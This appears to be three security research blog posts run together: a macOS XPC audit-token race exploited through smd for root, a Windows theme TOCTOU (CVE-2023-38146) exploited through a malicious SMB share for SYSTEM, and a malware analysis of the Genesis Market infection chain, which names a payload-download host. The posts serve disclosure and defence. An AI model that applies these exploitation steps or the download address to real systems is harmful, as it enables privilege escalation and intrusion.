In this blog post, weβll describe a design issue in the way XPC connections are authorised in Appleβs operating systems. This will start by describing how XPC works and is implemented on top of mach messages (based on our reverse engineering). Then, weβll describe the vulnerability we found, which stems from implementing a (presumed to be) one-to-one communication channel on top of a communication channel that allows multiple concurrent senders. Next, weβll describe this issue using an example for smd and diagnosticd on macOS. This instance was fixed in macOS 13.4 as CVE-2023-32405. As Apple did not apply a structural fix, but only fixed this instance, developers still need to keep this in mind when building XPC services and researchers may be able to find more instances of this issue.
Background
XPC is an important inter-process communication technology in all of Appleβs operating systems. XPC connections are very fast and efficient and API is easy to use. XPC messages are dictionaries with typed values, removing the need for custom (de)serialization code in most situations, which is often an area where vulnerabilities might occur.
XPC is often used across different security boundaries. For example, to implement a highly privileged daemon that can perform operations requested by apps. In these scenarios, authorization checks are very important for the security of the system. These checks could be verifying that the app is not sandboxed, or signed by a specific developer, holding an entitlement, etc.
It is welldocumentedthat the process ID (PID) (for example by using the function xpc_connection_get_pid) is not safe to use for such an authorization check: an application can send a message and immediately execute another process (in a way that keeps the same PID), hoping that the authorization check will check the new process instead. Instead, the function xpc_connection_get_audit_token should be used (which, annoyingly, is not part of the public XPC API on macOS). An audit token is a structure that contains not just the PID but also an PID version, which increases when spawning a new process, making it possible to distinguish them and therefore obtain the right process.
In this blog post, weβll describe that xpc_connection_get_audit_token may also use the wrong process in certain situations, and that xpc_dictionary_get_audit_token is better to use in those cases. In order to explain why, we have to explain the way XPC implemented.
XPC is built on top of mach messages. While this part of the mach kernel is open source, XPC is not, so to figure out how to (for example) establish an XPC connection or serialize an XPC message, we have had to reverse engineer the libraries implementing this. Therefore, keep in mind that this contains some guesswork and Apple may change the implementation at any moment.
Mach messages 101
Mach messages are sent over a mach port, which is a single receiver, multiple sender communication channel built into the mach kernel. Multiple processes can send messages to a mach port, but at any point only a single process can read from it. Just like file descriptors and sockets, mach ports are allocated and managed by the kernel and processes only see an integer, which they can use to indicate to the kernel which of their mach ports they want to use.
Mach messages are sent or received using the mach_msg function (which is essentially a syscall). When sending, the first argument for this call must be the message, which has to start with a mach_msg_header_t followed by the actual payload:
The process that can receive messages on a mach port is said to hold the receive right, while the senders hold a send or a send-once right. Send-once, as the name implies, can only be used to send a single message and then is invalidated.
The fact that mach ports only allow messages in a single direction may sound quite limited, but of course there are ways to deal with this. The main way bidirectional communication can be established is by transferring these rights to another process using a mach message. A receive or send-once right can be moved to another process and a send right can be moved or copied.
One place where this is used is for a field in the mach message header called the reply port (msgh_local_port). A process can specify a mach port with this field where the receiver of the message can send a reply to this message. The bitflags in msgh_bits can be used to indicate that a send-once right should be derived and transferred for this port (MACH_MSG_TYPE_MAKE_SEND_ONCE).
The other fields of the message header are:
msgh_size: the size of the entire packet.
msgh_remote_port: the port on which this message is sent.
msgh_id: the ID of this message, which is interpreted by the receiver.
XPC
To establish an XPC connection there are multiple options (mach services, embedded XPC services, using endpoints, etc.). Weβll focus on an app establishing an XPC connection to a mach service here. Mach services use a service name on which they are reachable. This name should be specified in the MachServices key in the launch daemon configuration. For example, smd, the service management daemon, specifies the name com.apple.xpc.smd:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plistversion="1.0"><dict><key>AuxiliaryBootstrapperAllowDemand</key><true/><key>EnablePressuredExit</key><true/><key>Label</key><string>com.apple.xpc.smd</string><key>LaunchEvents</key><dict><key>com.apple.fsevents.matching</key><dict><key>com.apple.xpc.smd.WatchPaths</key><dict><key>Path</key><string>/Library/LaunchDaemons/</string></dict></dict></dict><key>MachServices</key><dict><key>com.apple.xpc.smd</key><true/></dict><key>ProcessType</key><string>Adaptive</string><key>Program</key><string>/usr/libexec/smd</string></dict></plist>
When a launch agent or daemon launches, they generate a new mach port and send a send right to this port to the bootstrap service (part of launchd). Weβll refer to this as the service port.
To connect to a mach service, the client asks the bootstrap service for that name. If that name is registered, it duplicates the send right and sends it back to the application.
Once the app has the service port, it generates two new mach ports: the server port and the client port. Then, it sends a message to the service port (with an msgh_id of 0x77303074, or 'w00t') in which it moves the receive right for the server port and copies a send right for the client port. If the service accepts the connection, it starts listening for messages on the server port and it can use the client port to send messages to the app.
As you can see from this description, normal XPC mach messages donβt use the reply port field. But it is used for XPC messages that expect a reply (xpc_connection_send_message_with_reply and xpc_connection_send_message_with_reply_sync). Replies and normal XPC messages are therefore transferred over completely different mach ports. This way the implementation can keep track of multiple pending replies and differentiate them from normal messages automatically.
Now where do audit tokens come in? Well, when receiving a mach message, an application can add a flag that asks the kernel to append a certain trailers to the received message. The flag MACH_RCV_TRAILER_AUDIT asks the kernel to append a trailer that contains the audit token of the sender of that message. libxpc sets this flag, so when a message comes in, the function _xpc_connection_set_creds copies the audit token from the trailer to the XPC connection object.
Vulnerability
We have just seen the following:
Mach ports are single receiver, multiple sender.
An XPC connectionβs audit token is the audit token of copied from the most recently received message.
Obtaining the audit token of an XPC connection is critical to many security checks.
This lead us to the research question: can we set up an XPC connection where multiple different processes are sending messages, leading to a message from one process being checked with the audit token of a different process?
XPCβs abstraction is a one-to-one connection, but it is based on top of a technology which can have multiple senders. As with many security issues, we are trying to break the abstraction and see what might be possible.
We established a few things that wouldnβt work:
Audit tokens are often used for an authorization check to decide whether to accept a connection. As this happens using a message to the service port, there is no connection established yet. More messages on this port will just be handled as additional connection requests. So any checks before accepting a connection are not vulnerable (this also means that within -listener:shouldAcceptNewConnection: the audit token is safe). We are therefore looking for XPC connections that verify specific actions.
XPC event handlers are handled synchronously. This means that the event handler for one message must be completed before calling it for the next one, even on concurrent dispatch queues. So inside an XPC event handler the audit token can not be overwritten by other normal (non-reply!) messages.
This gave us the idea for two different methods this may be possible:
A service that calls xpc_connection_get_audit_token while not inside the event handler for a connection.
A service that receives a reply concurrently with a normal message
Variant 1: calling xpc_connection_get_audit_token outside of an event handler
The first case we looked at is finding daemons that check an audit token asynchronously from the XPC event handler. To summarize the requirements, this requires:
Two mach services A and B that we can both connect to (based on the sandbox profile and the authorization checks before accepting the connection).
A must have an authorization check for a specific action that B can pass (but our app canβt).
For this authorization check, A obtains the audit token asynchronously, for example by calling xpc_connection_get_audit_token from dispatch_async.
We found a hit for these requirements with A as smd and B as diagnosticd.
Exploiting smd
smd handles features like login items and managing privileged helper tools. For example, the function SMJobBless can be used to install a new privileged helper tool, which is a command line executable included in an application that gets installed to run as root, which can be used to perform the features an app needs that require root without having to run the entire app as root.
Normally to use SMJobBless, an application would include the tool it wants to install inside Contents/Library/LaunchServices/ in its own app bundle and the key SMPrivilegedExecutables in the Info.plist file. To install it, it must ask the user to authenticate, which results in an authorization reference if it succeeds. That authorization reference must then be passed to SMJobBless. The goal of this exploit is to perform the installation of a privileged helper tool without obtaining an authorization reference first.
Internally, SMJobBless works by communicating with smd over XPC. Clients connection to smd can perform multiple actions. The message must specify the key βroutineβ to indicate which operation to perform. Routine 1004 is the one eventually called by SMJobBless. For this routine, dispatch_async is used to execute a block on a different dispatch queue:
The function named handle_bless includes a call to connection_is_unauthorized, which allows the operation to be performed if one of three checks passes:
The requesting application is running as root.
The requesting application has the entitlement com.apple.private.xpc.unauthenticated-bless.
The request contains authorization reference for the name "com.apple.ServiceManagement.blesshelper" (this is what SMJobBless obtains).
__int64__fastcallconnection_is_unauthorized(void*connection,void*message,char*authorization_name,OSStatus*error){[...]v22=authorization_name;v5=objc_retain(connection);v6=objc_retain(message);memset(audit_token,170,sizeof(audit_token));xpc_connection_get_audit_token(v5,audit_token);v7=0;// [1]: field 1 contains the UID, UID == 0 means root
if(audit_token[1]){v8=error;// [2]: Has a specific entitlement
v9=(void*)xpc_connection_copy_entitlement_value(v5,"com.apple.private.xpc.unauthenticated-bless");v10=&_xpc_bool_true;if(v9!=&_xpc_bool_true){v11=v9;length=0LL;// [3]: Passed in an authorization reference for the specified name
data=(constAuthorizationExternalForm*)xpc_dictionary_get_data(v6,"authref",&length);v7=81;if(data&&length==32){authorization=0LL;v13=AuthorizationCreateFromExternalForm(data,&authorization);if(v13){*v8=v13;v7=153;}else{v17=0LL;v18=0LL;v16=v22;*(_QWORD*)&rights.count=0xAAAAAAAA00000001LL;rights.items=(AuthorizationItem*)&v16;v14=AuthorizationCopyRights(authorization,&rights,0LL,3u,0LL);if(v14==-60005){v7=1;}elseif(v14){*v8=v14;v7=153;}else{v7=0;}AuthorizationFree(authorization,0);}}v10=v11;}}else{v10=0LL;}objc_release(v10);objc_release(v6);objc_release(v5);returnv7;}
In order to perform our attack, we need a second service too. We picked diagnosticd because it runs as root, but many other options likely exist. This daemon can be used to monitor a process. Once monitoring has started, it will send multiple messages per second about, for example, the memory use and CPU usage of the monitored process.
To perform our attack, we establish our connection to smd by following the normal XPC protocol. Then, we establish a connection to diagnosticd, but instead of generating two new mach ports and sending those, we replace the client port send right with a copy of the send right we have for the connection to smd. What this means is that we can send XPC messages to diagnosticd, but any messages diagnosticd sends go to smd. For smd, both our and diagnosticdβs messages appear arrive on the same connection.
Next, we ask diagnosticd to start monitoring our (or any active) process and we spam routine 1004 messages to smd.
This creates a race condition that needs to hit a very specific window in handle_bless. We need the call to xpc_connection_get_pid at [1] below to return the PID of our own process, as the privileged helper tool is in our app bundle. However, the call to xpc_connection_get_audit_token inside the connection_is_authorized function at [2] must use the audit token of diganosticd.
__int64__fastcallhandle_bless([...]){[...]err=0;pid=xpc_connection_get_pid(connection);// [1] Must be our process
memset(&audit_token,170,sizeof(audit_token));xpc_dictionary_get_audit_token(message,&audit_token);v129=connection;// [2] Must use diagnosticd
is_unauthorized=connection_is_unauthorized(connection,message,"com.apple.ServiceManagement.blesshelper",&err);if(is_unauthorized){v15=is_unauthorized;send_error_reply(message,is_unauthorized,err);LABEL_3:v16=0LL;gotoLABEL_4;}string=xpc_dictionary_get_string(message,"identifier");if(!string){v15=22;gotoLABEL_3;}v135=string;path_of_pid=get_path_of_pid(pid);if(!path_of_pid){v15=2;gotoLABEL_3;}v22=(id)path_of_pid;property=(constchar*)xpc_bundle_get_property(path_of_pid,9LL);v15=107;if(!property)gotoLABEL_48;v24=sub_10000447A("%s/Library/LaunchServices/%s",property,v135);
While that looks difficult to hit, smd doesnβt close the connection once it receives a malformed or unauthorized message so we can keep retrying.
Once our privileged helper tool is installed, we simply connect and send a message to get it to launch, and we have gained code execution as root!
We originally discovered this vulnerability on macOS Big Sur, in macOS Ventura it still worked, but Apple had added notifications about added launch agents, making it no longer stealthy. However, as these notifications are only showed afterwards, we have already succeeded at that point.
Sandbox escape?
Privilege escalation is fun, but itβs even more fun if we can escape the sandbox at the same time. Our smd exploit kept working perfectly if we enabled the βApp Sandboxβ checkbox in Xcode, as both mach services can be reached by sandboxed apps.
However, the practical impact of this as a sandbox escape is very limited. Due to the requirement to embed the privileged helper tool in the app and set the Info.plist key, we can not escape from an arbitrary compromised application that has enabled the Mac Application Sandbox (and definitely not from a compromised browser renderer). We could attempt to submit an app like this to the Mac App Store, but static checks on the application will almost certainly find and reject our embedded helper tool (we didnβt test this, as testing against the Mac App Store review process tends to get one on Appleβs bad side).
This leaves just one scenario: we can construct an application that we offer as a download outside of the Mac App Store that is ostensibly sandboxed, but which turns out to escape its sandbox when launched and which even elevates its privileges to root. The number of users who will check if an application they have downloaded from the internet is sandboxed before running it will likely be extremely low.
Variant 2: reply forwarding
We also identified a second variant that can also modify the audit token. As mentioned before, the handler for events on an XPC connection is never executed multiple times concurrently. However, XPC reply messages are handled differently. Two functions exist for sending a message that expects a reply:
void xpc_connection_send_message_with_reply(xpc_connection_t connection, xpc_object_t message, dispatch_queue_t replyq, xpc_handler_t handler), in which case the XPC message is received and parsed on the specified queue.
xpc_object_t xpc_connection_send_message_with_reply_sync(xpc_connection_t connection, xpc_object_t message), in which case the XPC message is received and parsed on the current dispatch queue.
Therefore, XPC reply packets may be parsed while an XPC event handler is executing. While _xpc_connection_set_creds does use locking, this only prevents partial overwriting of the audit token, it does not lock the entire connection object, making it possible to replace the audit token in between the parsing of a packet and the execution of its event handler.
For this scenario we would need:
As before, two mach services A and B that we can both connect to.
Again, A must have an authorization check for a specific action that B can pass (but our app canβt).
A sends us a message that expects a reply.
We can send a message to B that it will reply to.
We wait for A to send us a message that expects a reply (1), instead of replying we take the reply port and use it for a message we send to B (2). Then, we send a message that uses the forbidden action and we hope that it arrives concurrently with the reply from B (3).
While we have confirmed this variant works using custom mach services, we did not find any practical examples with security impact.
More impact?
We quickly found one instance of the first variant in smd (which affects only macOS), but does that make it a design issue in XPC or an error in smd? Arguing that itβs a design issue becomes a lot easier with more examples, preferably also on other platforms like iOS.
We spent a long time trying to find other instances, but the conditions made it difficult to search for either statically or dynamically. To search for asynchronous calls to xpc_connection_get_audit_token, we used Frida to hook on this function to check if the backtrace includes _xpc_connection_mach_event (which means itβs not called from an event handler). But this only finds calls in the process we have currently hooked and from the actions that are actively used. Analysing all reachable mach services in IDA/Ghidra was very time intensive, especially when calls involved the dyld shared cache. We tried scripting this to look for calls to xpc_connection_get_audit_token reachable from a block submitted using dispatch_async, but parsing blocks and calls passing into the dyld shared cache made this difficult too. After spending a while on this, we decided it would be better to submit what we had.
While this did not result in any further instances of this issue, the time we spent reverse engineering XPC services did lead us to discover CVE-2023-32437 in nsurlsessiond, but thatβs for another writeup.
The fix
In the end, we reported the general issue and the specific issue in smd. Apple fixed it only in smd by replacing the call to xpc_connection_get_audit_token with xpc_dictionary_get_audit_token.
The function xpc_dictionary_get_audit_token copies the audit token from the mach message on which this XPC message was received, meaning it is not vulnerable. However, just like xpc_dictionary_get_audit_token, this is not part of the public API. For the higher level NSXPCConnection API, no clear method exists to get the audit token of the current message, as this abstracts away all messages into method calls.
It is unclear to us why Apple didnβt apply a more general fix, for example dropping messages that donβt match the saved audit token of the connection. There may be scenarios where the audit token of a process legitimately changes but the connection should stay open (for example, calling setuid changes the UID field), but changes like a different PID or PID version are unlikely to be intended.
In any case, this issue still remains with iOS 17 and macOS 14, so if you want to go and look for it, good luck!
Microsoft has published a patch for CVE-2023-38146 on patch Tuesday of September 2023. The advisory for this vulnerability mentions that the impact is remote code execution, which was demonstrated by @gabe_k - the researcher who first reported the vulnerability to Microsoft in May of 2023. Gabeβs ThemeBleed writeup and proof-of-concept demonstrate how an attacker might exploit the vulnerability for code execution by luring an unsuspecting victim into opening a booby-trapped .themepack file.
We had also identified and reported the same vulnerability in August of 2023. But, our proof-of-concept exploit took a slightly different path with a distinct outcome. It turns out that it is possible to exploit this vulnerability for initial access as well as privilege escalation!
In this writeup, weβll cover the code path that weβve identified to the vulnerability as well as how we exploited it for privilege escalation.
Background
Windows users can modify their desktop environment to better suit their preferred style. This is done through the use of theme files which are simple INI-style config files with the .theme extension. These files consist of key-value entries for text colors, scrollbar colors, desktop icons and the like. Next to simple graphical elements, Windows themes must contain an entry denoting the themeβs associated βVisual Stylesβ. This entry can be used to specify color and sizing information for UI elements. Optionally, it can also specify a Path entry pointing to an .msstyles file. These are Portable Executable (PE) files that should only contain resources which control the styling of βdeeperβ elements of the operating systemβs UI, such as windows and buttons. Once a user chooses a theme, if the [VisualStyles]\Path entry exists and points to a valid .msstyles file, it will be stored in their registry hive at HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName. Usually, it is set to the visual styles file for the Windows default theme, Aero.msstyles.
Any user may use any theme or modify one to their heartβs content, but they may not use any visual styles files that are not provided by Microsoft. That is because .msstyles PEs are signed and validated at some point during processing.
While investigating signature verification routines in Windows 11, we noticed an oddity in how theme loading code handled .msstyles files. This oddity was our path to the discovery of CVE-2023-38146, which seems to stem from some code changes to Windows theme loading that were introduced in Windows 11.
User theme loading
Naturally, a userβs theme should be applied to their desktop session when they log in or whenever it needs to be re-applied. This process is performed by Winlogon as part of the userβs desktop creation and in response to a number of events that may occur in a userβs session.
On a vulnerable build of Windows 11, Winlogon (re-)loads the currently logged-in userβs as follows:
Some event that requires (re-)loading the current userβs theme occurs (e.g. user logs on), causing winlogon.exe to invoke a series of functions eventually calling UXInit!CThemeServicesInit::LoadCurrentTheme.
UXInit!CThemeServicesInit::LoadCurrentTheme reads the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName for the to be logged in user to obtain the path to the themeβs visual style file (the .msstyles file).
Eventually, UXInit!LoadThemeLibrary is called to load the themeβs .msstyles file using LoadLibraryEx while specifying the LOAD_LIBRARY_AS_DATAFILE flag to ensure that no code, if any, is executed. Afterwards, the loaded .msstyles moduleβs PACKTHEM_VERSION resource section is read. This is expected to contain a version number represented as a 2-byte integer.
If the value is equal to 999 (0x03e7), the function UXInit!ReviseVersionIfNecessary checks if the .msstyles path followed by _vrf.dll exists. For example, if the .msstyles file is located at C:\a.msstyles, then the function would check for the existence of C:\a.msstyles_vrf.dll.
If this path exists, its signature is verified for validity.
If that signature verification passes, the _vrf.dll file is loaded into winlogon.exe and the function <loaded_vrf_dll>!VerifyThemeVersion is called.
It is worth noting that all of the steps above are executed before any validation of the embedded .msstyle file signature.
Vulnerability
In the process above, steps (5) and (6) must be performed as one atomic operation from the point of view of the filesystem with no modifications being allowed to the _vrf.dll file in between. Otherwise, it is possible to swap the _vrf.dll file after step (5) but before step (6), which would be a Time-of-check to time-of-use (TOCTOU) vulnerability.
And this is exactly the vulnerability as can be seen in the decompilation of UXInit!ReviseVersionIfNecessary (irrelevant parts omitted for brevity):
// ...snip...
if(!PathFileExistsW(vrf_file_path))// [1]
return0x80004005;*&themeSig_object=&CThemeSignature::`vftable`;*(&themeSig_object+1)=0i64;v16[0]=0ui64;CThemeSignature::_Init(&themeSig_object,v7,v8);err=CThemeSignature::Verify(&themeSig_object,vrf_file_path);// [2]
CThemeSignature::~CThemeSignature(&themeSig_object);if((err&0x80000000)!=0){// ...snip...
// Do further checks using NtGetCachedSigningLevel
// ...snip...
}vrf_library=LoadLibraryW(vrf_file_path);// [3]
v11=vrf_library;if(!vrf_library)return0x80004005;VerifyThemeVersion=GetProcAddress(vrf_library,"VerifyThemeVersion");memset(v16,0,20);themeSig_object=xmmword_180028E88;err=VerifyThemeVersion();// ...snip...
The function will first check that the _vrf.dll file exists [1], then its signature is verified [2]. Next, LoadLibraryW will open the file again [3]. Because no locking is applied to the file between [2] and [3], it may be modified between these steps. By first placing a visual styles file that is properly signed and setting the current theme to use that path, and then replacing it at just the right moment with an arbitrary DLL, it is possible to load that DLL into winlogon.exe, executing its code as SYSTEM.
Exploitation
In order to successfully exploit the TOCTOU vulnerability, one would have to race against the vulnerable code path as it is repeatedly invoked while constantly switching between a properly signed visual styles file and a malicious one.
This means that a method to trigger the vulnerable code path in winlogon.exe repeatedly and quickly is necessary to improve the chances of a successful race in a short time window. Alternatively, a way to increase the race window duration or even skip it altogether would be sufficient as long as it is possible to trigger the vulnerable code path at least once.
Regardless of the specifics, the exploit outline would be:
Prepare a .msstyles file with a PACKTHEM_VERSION of 999 at some path $x.
Change the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName to point to $x.
Put a validly signed .msstyles file at $x_vrf.dll.
Trigger the theme loading code path.
Replace the file $x_vrf.dll with our malicious version, hopefully between the signature verification check and the LoadLibraryW call.
If all goes well, then our payload is now executing inside winlogon.exe, which is running as NT AUTHORITY\SYSTEM.
Otherwise, repeat steps (3) to (5).
Winning ^W Avoiding the race
While it may be fun to exploit race conditions, itβs even better if there is no need to race at all. Since an attacker has full control of the themeβs visual styles DLL path, there is no need to race. All they would have to do is specify a UNC path pointing to a file on a remote SMB share that is under their control. Doing so would allow them to control exactly which version of the _vrf.dll is returned for which file read operation.
The only requirement is that the share at the other end is set up to host a properly signed .msstyles file and returns a validly signed _vrf.dll file on the first read and a malicious _vrf.dll file the second time.
Triggering the vulnerable code path
As previously mentioned, Winlogon is responsible for creating the userβs desktop upon user logon. So it stands to reason that logging out then back in again should trigger the vulnerable code path. And indeed, that does cause a theme reload and combined with a visual styles file path pointing to a remote SMB share, weβre guaranteed to exploit the vulnerability successfully in one shot. However, it seemed a bit complicated so we set out to find another way.
We ended up finding out that changing the UIβs scaling to a value > 100% will trigger a theme reload at least once, but is a bit flaky in our tests. Since racing is no longer needed, that does not matter anyway and a single theme reload is sufficient to exploit the vulnerability. On the upside, changing the UIβs scaling can be easily done with some PowerShell:
Modifying the exploit template from earlier, a reliable exploit could look like this:
Prepare a .msstyles file with a PACKTHEM_VERSION of 999 and store it on an attacker-controlled SMB share at \\<share host>\path\to\file.msstyles
Change the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName to point to \\<share host>\path\to\file.msstyles.
Put a validly signed .msstyles file at \\<share host>\path\to\file.msstyles_vrf.dll
Trigger a theme re-load by setting the UI scaling to some value > 100%
Wait until the file at \\<share host>\path\to\file.msstyles_vrf.dll is read once
Replace the file \\<share host>\path\to\file.msstyles_vrf.dll with a malicious version.
When the file is requested for the second time by LoadLibraryW, itβs presented instead with the malicious version, thereby achieving code execution inside winlogon.exe
For our exploit, we set up a remote host that is running a samba share and a scapy-based Python script to perform the file replacement step. The script detects when the first read operation has been sent over the wire, after which it replaces the validly signed file.msstyles_vrf.dll on disk with our malicious DLL.
Demo
The video below shows the exploit in action. We start with a standard authenticated user, lowuser, then run the exploit script. It sets the userβs visual styles DLL key described above to \\192.168.64.1\public\asdf.msstyles. Afterwards, it changes the UIβs scaling to 150%, causing winlogon.exe to reload the userβs theme. Once the .msstyles file is loaded and its PACKTHEM_VERISON resource is checked, winlogon.exe verifies the signature of \\192.168.64.1\public\asdf.msstyles_vrf.dll. This signature verification step passes since the first file presented by the SMB share is correctly signed. Afterwards, winlogon.exe loads the DLL one more time at which point our Python script has replaced it with an unsigned malicious DLL. The result can be seen as the malicious DLL spawns an interactive command prompt as NT AUTHORITY\SYSTEM.
Fix analysis
Microsoftβs patch updated the code for LoadThemeLibrary in both uxtheme.dll and UXInit.dll to remove the PACKTHEM_VERSION check and the ReviseVersionIfNecessary function entirely. Hence, the initially vulnerable code path no longer loads any DLLs in that path besides the LOAD_LIBRARY_AS_DATAFILE loading of the .msstyles PE.
On the other hand, the fix did not address how visual styles signatures are validated. The responsible code is still vulnerable to a TOCTOU vulnerability, so it may be possible for attackers to exploit any processing bugs that occur after signature validation.
Detection
Since the fix removes the βvisual style version verificationβ functionality entirely, it seems safe to assume that Microsoft has deemed it unnecessary. Therefore, any attempt to load a DLL whose path ends in .msstyles_vrf.dll is likely a CVE-2023-38146 exploit attempt.
For the last couple of weeks weβve assisted the Dutch police in investigating the Genesis Market. In case you are unfamiliar with this market, it was used to sell stolen login credentials, browser cookies and online fingerprints (in order to prevent βrisky sign-inβ detections), by some referred to as IMPaas, or Impersonation-as-a-Service. The market seemed to have started in 2018 and its activities have resulted in approximately two million victims. If you want to know more about this operation, you can read our other blog post. You can also check if your data has been compromised by the market operators via the website of the Dutch police.
In order to operate this market, victims were infected with malware that would steal all data from their browser. The malware was persistent, so that any new information added to the browser later could be stolen as well. Buyers would receive access to a custom Chromium build or browser extension which could load the stolen information of a victim.
We helped the police by analysing the malware that got installed by its victims and by analysing the browser that would be accessible for buyers. The focus was to determine the infection chain of the victim. Additionally, we looked at the browser available to buyers, to see if this would give new insights about the methods used by the market or the buyers. The victim in this case got infected in the second half of February.
Due to the short timespan in which this research had to be conducted, it can be that some details are missing or not 100% accurate. Weβve been careful to mention any uncertainties in this article. This article should however give some more insight on how this market operated and can hopefully give future researchers a head start if this market ever re-launches. In addition, it highlights a trend of attackers switching from stealing credentials to stealing session cookies, to cope with the increased adoption of multi-factor and risk-based authentication.
This analysis starts with a write-up of the infection chain and an analysis of the malware that gets dropped. In the second half we dig deeper into the buyers browser extension and how it can be fingerprinted. In case you are interested, Trellix also has a writeup of the exploit chain of one of the other victims.
The infection
Stage one: the loader
The infection we investigated started (ironically) because the victim wanted to activate his or her anti-virus product. Rather than paying for a subscription, the victim downloaded an illegal activation crack. This ended up uninstalling the original AV product and installing malware insteadβ¦
The activation crack came as an executable, setup.exe, packed in a ZIP file. Looking at the creation date, it seems like the file was created the day before. Possibly to bypass any new AV detection rules. The file is 444 MB in size, but the last 439 MB are all set to 0.
Upon further investigation, setup.exe seemed to be Inno Setup generated installer, with the packaged data being the malicious payload. Luckily, we could quickly test this hypothesis and make use of a wide array of tools to investigate the installer package further:
$ cd extracted && file tmp/*
isgoisegjoqwg.dll: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3jcoigasjioqeg.dll: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2023:02:09 01:02:17], progressive, precision 8, 3840x2160, components 3yvibiajwi.dll: PE32 executable (DLL)(GUI) Intel 80386, for MS Windows
The two images seem unrelated to the actual malware. They are a picture of a pride flag and a picture of LeBron James.
yvibiajwi.dll stood out because there were multiple identical copies of that DLL in the directories created by setup.exe on the victimβs machine, but none of the other two files.
Additionally, the second stage executable setup.tmp loads yvibiajwi.dll at some point. More specifically, the following high level sequence of actions takes place:
setup.exe creates a new directory, referred to as the setup temp directory from here on, with the format is-<5 uppercase random alphanumeric>.tmp in the directory retrieved by GetTempPath()
setup.exe writes another executable, setup.tmp to the setup temp directory
setup.exe launches setup.tmp with the command line argument /SL5="$B0638,3246841,963072,<path to setup.exe>"
setup.tmp opens the setup.exe file, reads data from it and writes yvibiajwi.dll to the setup temp directory
setup.tmp launches setup.exe with the command line argument /VERYSILENT
setup.exe creates a new setup temp directory and writes setup.tmp to the new directory then launches it with a similar /SL5 command line argument
setup.tmp reads yvibiajwi.dll from the packaged data in setup.exe and writes it to the most recently created setup temp directory
setup.tmp loads yvibiajwi.dll
The second invocation with /VERYSILENT hides all of the installerβs windows, per Inno Setupβs documentation. Keeping Inno Setupβs intended purpose in mind, the above flow seems unusual. It would likely not be standard functionality unless there is extra code embedded into the generated installer, is there?
Embedded PascalScript
Inno Setup supports adding specialized tasks to a generated installer beyond simply unpacking the contents. An installer script can specify user-specified yet defined tasks in the [Tasks] section, or programs to execute in the [Run] section. Additionally, an installer script can also specify custom code in PascalScript to customize the (un-)installation process. setup.exe also includes an embedded compiled script which defines a function to be called on setup initialization. Using innounp and IFPSTools.NET, the embedded PascalScript can be unpacked and decompiled for analysis:
The functionality implemented by the above script seems to match up with the observed behavior. When the installer process executes it in βSILENTβ mode, it also invokes a function called RedrawElipse in yvibiajwi.dll, which kicks off the next stage of the infection chain.
Diving into yvibiajwi.dll
The DLL seems to be written in C++. Upon loading this DLL in IDA, weβre finally met with our first taste of control flow obfuscation in the infection chain so far:
The obfuscation techniques applied are limited to runs of bogus Windows/libc API calls that are guarded by an always false if condition or empty loops, so itβs relatively simple to ignore them:
With the control flow cleaned up a bit, we can finally tell that the DLL is another dropper which loads a piece of shellcode and executes it. However, execution of the shellcode is not done on DLL loading in DllMain, instead DllMain only sets up a few pointers and allocates memory for the shellcode and nothing else. In order to execute the embedded shellcode, the exported RedrawElipse function has to be called with the first argument set to 0x77A76 or 490102. Of course, this is exactly how the function is invoked in the embedded PascalScript in setup.exe:
Once invoked, RedrawElipse eventually calls crypt32.dll!CryptStringToBinaryA to decode the embedded base64 shellcode block. It then decrypts the decoded block using what seems to be a custom 64-bit block cipher with a hardcoded key then executes the decrypted shellcode.
The shellcode then decrypts an embedded loader executable using the eXtended Tiny Encryption Algorithm (XTEA) block cipher and uses process hollowing to inject it into a newly spawned explorer.exe process. Afterwards, the injected loader downloads a file from http://194.135.33[.]96/rozemarin.exe, which gets renamed to svchost.exe and executed. It also executes a PowerShell script which downloads some more resources. Both are described in more detail hereafter.
Taking a closer look at svchost.exe
All of the stages prior to the one that loaded this executable involved dropping a static next stage in some shape or form. However, this executable was downloaded and is therefore one of the first elements of the infection chain that might differ from one campaign to the next. Case in point: after extracting the previous stageβs executable, we found a matching submission (by hash) on VirusTotal. In addition, linked to the VirusTotal submission is a VMRay analysis report showing a different hash for the svchost.exe executable to this one which was acquired from the victimβs filesystem.
Focusing on this svchost.exe version: it sets off another series of nested encrypted shellcode stages. The first stage is decrypted and executed, which sets up and executes the second stage and so on. Each stage is encrypted differently from its successor:
The second stage is encrypted using a custom cipher.
The third and final stage is an executable that is embedded in plaintext in the second stage.
Interestingly, the final stage is executed through βself PE injectionβ. This is achieved by having the second stage shellcode replace the PE of its own process, namely the svchost.exe executable, with the embedded final stageβs PE. Afterwards, relocations are updated to match those of the final stage PE, and the second stage shellcode jumps to the now-mapped final stage executableβs entry point.
While analyzing the final executable, we noticed that there is quite some similarity between it and a DLL found on the victimβs machine which matched the Danabot malware. This makes sense, as we learned that the Genesis Market relied on multiple known botnets in the past. AZORult, GoodKit and Arkei also seem linked to prior infections. The reason we suspected Danabot is because both pieces of code are written in Delphi and are heavily obfuscated using almost identical techniques. We were able to find a much stronger link when analysing the chain starting from svchost.exe dynamically:
The screenshot above shows that the at some point, svchost.exe writes the malicious Qruhaepdediwhf.dll DLL to the userβs %TMP% directory and loads it using rundll32.exe. Shortly after doing so, svchost.exeβs process exits while the rundll32.exe process that loaded the malicious DLL continues. Furthermore, we found that both the Qruhaepdediwhf.dll file from the victimβs device and the one dropped in the analysis detonation run are almost identical except for what seems to be a randomly generated hex-encoded identifier at offset 0x0050695C (exact identifiers modified):
At this stage, we stopped analysing the infection chain further since the links between the artefacts on the victimβs device and the suspected initial infection vector have been sufficiently clarified. The remainder of this document focuses on the parts of the malware that are more strongly related to the marketβs illicit activities.
Downloading remote resources
As mentioned earlier, the final loader executable that is executed by the decoded shellcode in yvibiajwi.dll not only drops svchost.exe, but also runs the following PowerShell command:
